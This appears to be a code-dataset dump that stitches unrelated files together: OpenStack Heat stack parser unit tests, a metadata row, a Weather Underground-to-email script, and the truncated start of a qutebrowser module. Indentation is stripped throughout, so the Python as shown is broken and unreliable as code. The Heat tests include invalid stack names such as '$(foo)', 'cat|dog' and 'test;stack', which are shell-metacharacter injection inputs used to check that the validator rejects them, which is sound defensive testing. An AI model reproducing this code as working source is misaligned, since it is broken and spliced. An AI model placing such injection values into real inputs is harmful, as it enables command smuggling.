self.assertFalse(identifier.path)
@stack_delete_after
def test_set_param_id(self):
dummy_stackid = 'STACKABCD1234'
self.m.StubOutWithMock(uuid, 'uuid4')
uuid.uuid4().AndReturn(dummy_stackid)
self.m.ReplayAll()
self.stack = parser.Stack(self.ctx, 'param_arn_test',
parser.Template({}))
exp_prefix = 'arn:openstack:heat::test_tenant:stacks/param_arn_test/'
self.assertEqual(self.stack.parameters['AWS::StackId'],
exp_prefix + 'None')
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(self.stack.parameters['AWS::StackId'],
exp_prefix + dummy_stackid)
self.assertEqual(self.stack.parameters['AWS::StackId'],
identifier.arn())
self.m.VerifyAll()
@stack_delete_after
def test_load_param_id(self):
self.stack = parser.Stack(self.ctx, 'param_load_arn_test',
parser.Template({}))
self.stack.store()
identifier = self.stack.identifier()
self.assertEqual(self.stack.parameters['AWS::StackId'],
identifier.arn())
newstack = parser.Stack.load(self.ctx, stack_id=self.stack.id)
self.assertEqual(newstack.parameters['AWS::StackId'], identifier.arn())
@stack_delete_after
def test_created_time(self):
self.stack = parser.Stack(self.ctx, 'creation_time_test',
parser.Template({}))
self.assertEqual(self.stack.created_time, None)
self.stack.store()
self.assertNotEqual(self.stack.created_time, None)
@stack_delete_after
def test_updated_time(self):
self.stack = parser.Stack(self.ctx, 'update_time_test',
parser.Template({}))
self.assertEqual(self.stack.updated_time, None)
self.stack.store()
stored_time = self.stack.updated_time
self.stack.state_set(self.stack.CREATE_IN_PROGRESS, 'testing')
self.assertNotEqual(self.stack.updated_time, None)
self.assertNotEqual(self.stack.updated_time, stored_time)
@stack_delete_after
def test_delete(self):
self.stack = parser.Stack(self.ctx, 'delete_test',
parser.Template({}))
stack_id = self.stack.store()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.stack.delete()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertEqual(db_s, None)
self.assertEqual(self.stack.state, self.stack.DELETE_COMPLETE)
@stack_delete_after
def test_delete_rollback(self):
self.stack = parser.Stack(self.ctx, 'delete_rollback_test',
parser.Template({}), disable_rollback=False)
stack_id = self.stack.store()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.stack.delete(action=self.stack.ROLLBACK)
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertEqual(db_s, None)
self.assertEqual(self.stack.state, self.stack.ROLLBACK_COMPLETE)
@stack_delete_after
def test_delete_badaction(self):
self.stack = parser.Stack(self.ctx, 'delete_badaction_test',
parser.Template({}))
stack_id = self.stack.store()
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.stack.delete(action="wibble")
db_s = db_api.stack_get(self.ctx, stack_id)
self.assertNotEqual(db_s, None)
self.assertEqual(self.stack.state, self.stack.DELETE_FAILED)
@stack_delete_after
def test_update_badstate(self):
self.stack = parser.Stack(self.ctx, 'test_stack', parser.Template({}),
state=parser.Stack.CREATE_FAILED)
stack_id = self.stack.store()
self.assertEqual(self.stack.state, parser.Stack.CREATE_FAILED)
self.stack.update({})
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
@stack_delete_after
def test_resource_by_refid(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'resource_by_refid_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertTrue('AResource' in self.stack)
resource = self.stack['AResource']
resource.resource_id_set('aaaa')
self.assertNotEqual(None, resource)
self.assertEqual(resource, self.stack.resource_by_refid('aaaa'))
resource.state = resource.DELETE_IN_PROGRESS
self.assertEqual(None, self.stack.resource_by_refid('aaaa'))
self.assertEqual(None, self.stack.resource_by_refid('bbbb'))
@stack_delete_after
def test_update_add(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertTrue('BResource' in self.stack)
@stack_delete_after
def test_update_remove(self):
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertFalse('BResource' in self.stack)
@stack_delete_after
def test_update_description(self):
tmpl = {'Description': 'ATemplate',
'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Description': 'BTemplate',
'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertEqual(self.stack.t[template.DESCRIPTION], 'BTemplate')
@stack_delete_after
def test_update_modify_ok_replace(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'xyz')
self.m.VerifyAll()
@stack_delete_after
def test_update_modify_update_failed(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=True)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_FAILED)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.m.VerifyAll()
@stack_delete_after
def test_update_modify_replace_failed_delete(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=True)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
# make the update fail deleting the existing resource
self.m.StubOutWithMock(resource.Resource, 'destroy')
resource.Resource.destroy().AndReturn("Error")
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.m.VerifyAll()
# Unset here so destroy() is not stubbed for stack.delete cleanup
self.m.UnsetStubs()
@stack_delete_after
def test_update_modify_replace_failed_create(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=True)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_update
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
# patch in a dummy handle_create making the replace fail creating
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.m.VerifyAll()
@stack_delete_after
def test_update_add_failed_create(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_create making BResource fail creating
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_FAILED)
self.assertTrue('BResource' in self.stack)
# Reload the stack from the DB and prove that it contains the failed
# resource (to ensure it will be deleted on stack delete)
re_stack = parser.Stack.load(self.ctx, stack_id=self.stack.id)
self.assertTrue('BResource' in re_stack)
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# There will be two calls to handle_update, one for the new template
# then another (with the initial template) for rollback
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
# patch in a dummy handle_create making the replace fail when creating
# the replacement resource, but succeed the second call (rollback)
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
generic_rsrc.GenericResource.handle_create().AndReturn(None)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback_fail(self):
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'xyz'}}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# There will be two calls to handle_update, one for the new template
# then another (with the initial template) for rollback
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
# patch in a dummy handle_create making the replace fail when creating
# the replacement resource, and again on the second call (rollback)
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_FAILED)
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback_add(self):
tmpl = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy handle_create making the replace fail when creating
# the replacement resource, and succeed on the second call (rollback)
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertFalse('BResource' in self.stack)
self.m.VerifyAll()
@stack_delete_after
def test_update_rollback_remove(self):
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType'},
'BResource': {'Type': 'GenericResourceType'}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
tmpl2 = {'Resources': {'AResource': {'Type': 'GenericResourceType'}}}
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
# patch in a dummy destroy making the delete fail
self.m.StubOutWithMock(resource.Resource, 'destroy')
resource.Resource.destroy().AndReturn('Error')
self.m.ReplayAll()
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertTrue('BResource' in self.stack)
self.m.VerifyAll()
# Unset here so destroy() is not stubbed for stack.delete cleanup
self.m.UnsetStubs()
@stack_delete_after
def test_update_replace_by_reference(self):
'''
assertion:
changes in dynamic attributes, due to other resources been updated
are not ignored and can cause dependant resources to be updated.
'''
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'smelly'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.assertEqual(self.stack['BResource'].properties['Foo'],
'AResource')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
br2_snip = {'Type': 'GenericResourceType',
'Properties': {'Foo': 'inst-007'}}
generic_rsrc.GenericResource.handle_update(
br2_snip).AndReturn(
resource.Resource.UPDATE_REPLACE)
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'FnGetRefId')
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'AResource')
generic_rsrc.GenericResource.FnGetRefId().MultipleTimes().AndReturn(
'inst-007')
self.m.ReplayAll()
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2))
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.UPDATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'smelly')
self.assertEqual(self.stack['BResource'].properties['Foo'], 'inst-007')
self.m.VerifyAll()
@stack_delete_after
def test_update_by_reference_and_rollback_1(self):
'''
assertion:
check that rollback still works with dynamic metadata
this test fails the first instance
'''
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'smelly'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.assertEqual(self.stack['BResource'].properties['Foo'],
'AResource')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'FnGetRefId')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
# mocks for first (failed update)
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'AResource')
# mock to make the replace fail when creating the replacement resource
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
# mocks for second rollback update
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.handle_create().AndReturn(None)
generic_rsrc.GenericResource.FnGetRefId().MultipleTimes().AndReturn(
'AResource')
self.m.ReplayAll()
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2),
disable_rollback=False)
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.m.VerifyAll()
@stack_delete_after
def test_update_by_reference_and_rollback_2(self):
'''
assertion:
check that rollback still works with dynamic metadata
this test fails the second instance
'''
# patch in a dummy property schema for GenericResource
dummy_schema = {'Foo': {'Type': 'String'}}
generic_rsrc.GenericResource.properties_schema = dummy_schema
tmpl = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'abc'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
tmpl2 = {'Resources': {
'AResource': {'Type': 'GenericResourceType',
'Properties': {'Foo': 'smelly'}},
'BResource': {'Type': 'GenericResourceType',
'Properties': {
'Foo': {'Ref': 'AResource'}}}}}
self.stack = parser.Stack(self.ctx, 'update_test_stack',
template.Template(tmpl),
disable_rollback=False)
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.assertEqual(self.stack['BResource'].properties['Foo'],
'AResource')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_update')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'FnGetRefId')
self.m.StubOutWithMock(generic_rsrc.GenericResource, 'handle_create')
# mocks for first and second (failed update)
generic_rsrc.GenericResource.handle_update(
tmpl2['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
br2_snip = {'Type': 'GenericResourceType',
'Properties': {'Foo': 'inst-007'}}
generic_rsrc.GenericResource.handle_update(
br2_snip).AndReturn(
resource.Resource.UPDATE_REPLACE)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'AResource')
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.UPDATE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.DELETE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.DELETE_COMPLETE)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.properties.validate()
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.CREATE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# mock to make the replace fail when creating the second
# replacement resource
generic_rsrc.GenericResource.handle_create().AndReturn(None)
generic_rsrc.GenericResource.handle_create().AndRaise(Exception)
# mocks for second rollback update
generic_rsrc.GenericResource.handle_update(
tmpl['Resources']['AResource']).AndReturn(
resource.Resource.UPDATE_REPLACE)
br2_snip = {'Type': 'GenericResourceType',
'Properties': {'Foo': 'AResource'}}
generic_rsrc.GenericResource.handle_update(
br2_snip).AndReturn(
resource.Resource.UPDATE_REPLACE)
# self.state_set(self.DELETE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
# self.state_set(self.DELETE_IN_PROGRESS)
generic_rsrc.GenericResource.FnGetRefId().AndReturn(
'inst-007')
generic_rsrc.GenericResource.handle_create().AndReturn(None)
generic_rsrc.GenericResource.handle_create().AndReturn(None)
# reverting to AResource
generic_rsrc.GenericResource.FnGetRefId().MultipleTimes().AndReturn(
'AResource')
self.m.ReplayAll()
updated_stack = parser.Stack(self.ctx, 'updated_stack',
template.Template(tmpl2),
disable_rollback=False)
self.stack.update(updated_stack)
self.assertEqual(self.stack.state, parser.Stack.ROLLBACK_COMPLETE)
self.assertEqual(self.stack['AResource'].properties['Foo'], 'abc')
self.m.VerifyAll()
def test_stack_name_valid(self):
stack = parser.Stack(None, 's', parser.Template({}))
stack = parser.Stack(None, 'stack123', parser.Template({}))
stack = parser.Stack(None, 'test.stack', parser.Template({}))
stack = parser.Stack(None, 'test_stack', parser.Template({}))
stack = parser.Stack(None, 'TEST', parser.Template({}))
stack = parser.Stack(None, 'test-stack', parser.Template({}))
def test_stack_name_invalid(self):
self.assertRaises(ValueError, parser.Stack, None, '_foo',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '1bad',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '.kcats',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, ' teststack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '^-^',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '\"stack\"',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '1234',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'cat|dog',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '$(foo)',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test/stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test\stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test::stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test;stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, 'test~stack',
parser.Template({}))
self.assertRaises(ValueError, parser.Stack, None, '#test',
parser.Template({}))
@stack_delete_after
def test_resource_state_get_att(self):
tmpl = {
'Resources': {'AResource': {'Type': 'GenericResourceType'}},
'Outputs': {'TestOutput': {'Value': {
'Fn::GetAtt': ['AResource', 'Foo']}}
}
}
self.stack = parser.Stack(self.ctx, 'resource_state_get_att',
template.Template(tmpl))
self.stack.store()
self.stack.create()
self.assertEqual(self.stack.state, parser.Stack.CREATE_COMPLETE)
self.assertTrue('AResource' in self.stack)
rsrc = self.stack['AResource']
rsrc.resource_id_set('aaaa')
self.assertEqual('AResource', rsrc.FnGetAtt('foo'))
for state in (
rsrc.CREATE_IN_PROGRESS,
rsrc.CREATE_COMPLETE,
rsrc.UPDATE_IN_PROGRESS,
rsrc.UPDATE_COMPLETE):
rsrc.state = state
self.assertEqual('AResource', self.stack.output('TestOutput'))
for state in (
rsrc.CREATE_FAILED,
rsrc.DELETE_IN_PROGRESS,
rsrc.DELETE_FAILED,
rsrc.DELETE_COMPLETE,
rsrc.UPDATE_FAILED,
None):
rsrc.state = state
self.assertEqual(None, self.stack.output('TestOutput'))
rsrc.state = rsrc.CREATE_COMPLETE
| apache-2.0 | 1,009,920,623,515,962,600 | 41.237158 | 79 | 0.574119 | false |
inflatus/Python | Weather/weather_email.py | 1 | 2252 | # using JSON and the WeatherUnderground API
# parsing data and emailing it to myself
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import urllib.request
import json
from API_KEYS import EMAIL_ADDRESS, EMAIL_PASSWORD
from API_KEYS import WEATHER_UNDERGROUND_KEY
# getting the url
f = urllib.request.urlopen('http://api.wunderground.com/api/' + WEATHER_UNDERGROUND_KEY + '/geolookup/conditions/q/IN/Martinsville.json')
# decoding the text
json_string = f.read().decode('utf-8')
# parsing the information
parsed_json = json.loads(json_string)
location = parsed_json['location']['city']
temp_f = parsed_json['current_observation']['temp_f']
relative_humidity = parsed_json['current_observation']['relative_humidity']
wind_mph = parsed_json['current_observation']['wind_mph']
wind_gust = parsed_json['current_observation']['wind_gust_mph']
pressure_mb = parsed_json['current_observation']['pressure_mb']
feels_like = parsed_json['current_observation']['feelslike_f']
visibility_mi = parsed_json['current_observation']['visibility_mi']
precipitation_in = parsed_json['current_observation']['precip_today_in']
weather = parsed_json['current_observation']['weather']
# setting the data for location and temperature
data = (('Current temperature in {} is: {} F\n'.format(location, temp_f)) +
('Relative Humidity is at: {}\n'.format(relative_humidity)) +
('Winds are: {} mph\n'.format(wind_mph)) +
('Wind gusts are at: {} mph\n'.format(wind_gust)) +
('Pressure is: {} mb\n'.format(pressure_mb)) +
('Feels like: {} F\n'.format(feels_like)) +
('Visibility is: {} mi\n'.format(visibility_mi)) +
('Precipitation today: {} inches\n'.format(precipitation_in)) +
('General weather is: {}'.format(weather)))
# compose email message
fromaddr = (EMAIL_ADDRESS)
toaddr = (EMAIL_ADDRESS)
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Current Weather"
body = (data)
msg.attach(MIMEText(body, 'plain'))
# authenticate and send email
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(fromaddr, (EMAIL_PASSWORD))
text = msg.as_string()
server.sendmail(fromaddr, toaddr, text)
server.quit()
| mit | -1,424,017,478,444,561,400 | 36.533333 | 137 | 0.709147 | false |
t-wissmann/qutebrowser | qutebrowser/mainwindow/tabbedbrowser.py | 1 | 40900 | # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2020 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""The main tabbed browser widget."""
import collections
import functools
import weakref
import typing
import attr
from PyQt5.QtWidgets import QSizePolicy, QWidget, QApplication
